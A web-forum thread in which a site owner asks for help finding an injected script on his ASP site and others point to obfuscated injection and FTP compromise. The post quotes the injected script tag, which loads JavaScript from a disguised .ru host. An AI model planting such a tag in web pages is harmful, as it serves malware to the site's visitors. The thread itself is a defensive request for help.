Membership is FREE – with unlimited access to all features, tools, and discussions. Premium accounts get benefits like banner ads and newsletter exposure. ✅ Signature links are now free for all. 🚫 No AI-generated (LLM) posts allowed. Share your own thoughts and experience — accounts may be terminated for violations.
Sedo Sell Domains

Malware

Status
Not open for further replies.
charlie

charliecharlie is verified member.

Joined
Jul 8, 2004
Posts
2,605
Reaction score
25
Somewhere in my code is a malware script

it basically this
remote data services data control bloodhound virus embedded in webpage : services, remote, control

i've searched high and low for the script within the code without any luck. Using firefox with combined generated source you can see it - index page shows the code at the bottom

<script src="h**p://surfthechannel-com.tribalfusion.com.rakuten-co-jp.worldwebworld.ru:8080/google.com/google.com/yieldmanager.com/girlsgogames.com/it168.com/" id="Y1oh3ud7md" type="text/javascript" defer="defer"></script>

but looking at the 2 frames individually it isnt there

i've run malware and anti virus all over it with out joy. Also full script searches for any of the text within that link - even gone through all the javascript references

any ideas??
 
Not just from that I'm afraid, the ones I've seen have usually been included by using PHPs base64_decode function, making it harder to spot/find.
 
asp site so not sure it will be in the PHP?
have being using firebug to step through every parameter but not sure what exactly i'm looking for

well if you can spot it
URL is ******marineband.com
any help appreciated
 
bit odd that antivirus and malware missed these
I know that they cant cover every script but the format must be similar. I've had this before.
Oddly they are very recent additions - i archived the site last week and they are not in there then. Suppose hackers work every day :)
 
charlie said:
bit odd that antivirus and malware missed these
I know that they cant cover every script but the format must be similar. I've had this before.
Oddly they are very recent additions - i archived the site last week and they are not in there then. Suppose hackers work every day :)
Click to expand...

Are you going to make any changes to ensure that this doesn't happen again? Is everything up-to-date? It's possible that they're using some kind of automated software to exploit a weakness.
 
difficult to spot unless i know exactly how they got in
ftp access to files - means i can only change the password on the ftp, which will only delay them if they are that keen. Not sure what it was set to but i can only imagine thats the way they did it?
 
Status
Not open for further replies.

Similar threads

dee
Any Javascript Ninjas ?
Replies
14
Views
2K
RobMRobM is verified member.
RobM
Acorn Newsbot
  • Locked
Big increase in mobile malware threats
Replies
0
Views
769
Acorn NewsbotAcorn Newsbot is verified member.
Acorn Newsbot
Acorn Newsbot
  • Locked
10 things you can do to protect your data online
Replies
1
Views
908
fscisum
F
AuthorityDomain
  • Locked
Voucher Code Website for sale, Huge Potential
Replies
0
Views
358
AuthorityDomain
AuthorityDomain
Aegean
  • Locked
IE9 Cufon / Prettyphoto Problem
Replies
0
Views
4K
Aegean
Aegean

Rule #1: Be Respectful

Do not insult any other member. Be polite and do business. Thank you!

Members online

No members online now.
Total: 1,335 (members: 0, guests: 1,335)
IT.com

Premium Members

Sedo Global Domain Report
Catch Club
dot Hiphop

Latest Comments

Upcoming events

New Threads

Domain Forum Friends

DNForum
ConsultDomain.de
Domaineforum.fr
Domainforum.ro
DN.ca
DomainFragen.de
Inforum.in

Lastest Listings

Our Mods' Businesses

DomainUI Mod
*the exceptional businesses of our esteemed moderators
General chit-chat
Help Users
  • No one is chatting at the moment.
  • Siusaidh AcornBot:
    Siusaidh has left the room.
      Siusaidh AcornBot: Siusaidh has left the room.
      Top Bottom